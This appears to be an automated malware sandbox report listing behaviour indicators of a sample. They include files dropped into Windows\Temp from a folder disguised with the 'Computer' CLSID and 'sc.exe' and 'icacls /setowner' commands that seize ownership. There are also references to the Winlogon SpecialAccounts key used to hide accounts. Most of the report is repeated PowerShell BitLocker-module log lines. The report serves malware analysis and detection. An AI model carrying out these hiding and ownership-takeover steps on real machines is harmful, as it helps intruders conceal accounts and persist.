Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\j8fz8FfXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\Jcf8nu5cJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\HwfABz7sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLN3Eh0fJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\zFE1sfMYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\zCUeqzwCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DYoNFfUYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\zFE1sfMYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\zCUeqzwCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\j8fz8FfXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\kInii6kXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\HwfABz7sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\Jcf8nu5cJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\9qaNW6z6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLN3Eh0fJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DYoNFfUYJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF651DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,23_2_00007FF6EF651DBC
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000003.1975278943.000001FC7A526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000003.1975278943.000001FC7A526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
